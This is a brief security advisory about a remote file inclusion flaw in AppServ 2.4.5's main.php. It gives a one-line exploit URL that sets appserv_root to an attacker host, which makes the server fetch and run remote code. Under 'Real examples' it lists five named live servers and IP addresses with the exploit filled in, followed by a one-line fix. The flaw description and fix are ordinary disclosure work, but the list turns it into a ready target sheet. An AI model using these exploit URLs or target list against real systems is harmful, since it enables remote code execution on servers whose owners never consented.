SecurityvulnsSECURITYVULNS:DOC:10914Remote file include in appserv 2.4.5 (possible in previous versions)
======================================================================
Remote file include in appserv 2.4.5 (possible in previous versions)
[ What is Appserv ]
AppServ is the Apache/PHP/MySQL open source software installer packages.
Objective : - Easy to buid Webserver and Database Server
-
For those who just beginning client/server programming.
-
For web programmers/developers using PHP & MySQL.
-
For programming techniques that is easily to be ported to other platforms such as WindowZ
-
Single step installation , no need to perform multiple step, time consuming installation and configuration.
-
Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing.
-
If you hate and boring M$ IIS Webserver.
======================================================================
[ The bug ]
This in the directory appserv, file main.php:
======================================================================
include("$appserv_root/lang-english.php");
And another inclusion ( include("$appserv_root/lang-thai.php"); ), but with the same variable
======================================================================
[ Exploit ]
http://[target]/appserv/main.php?appserv_root=http://[attacker]/
======================================================================
[ Real examples ]
http://www.jr.ac.th/appserv/main.php?appserv_root=http://[attacker]/
http://140.116.83.224/appserv/main.php?appserv_root=http://[attacker]/
http://mail2.ttes.tcc.edu.tw/www2/appserv/main.php?appserv_root=http://[attacker]/
http://163.21.245.171/appserv/main.php?appserv_root=http://[attacker]/
http://trainer.ma.cx/appserv/main.php?appserv_root=http://[attacker]/
======================================================================
[ Fix ]
Eliminate the directory appserv (it does not have any utility)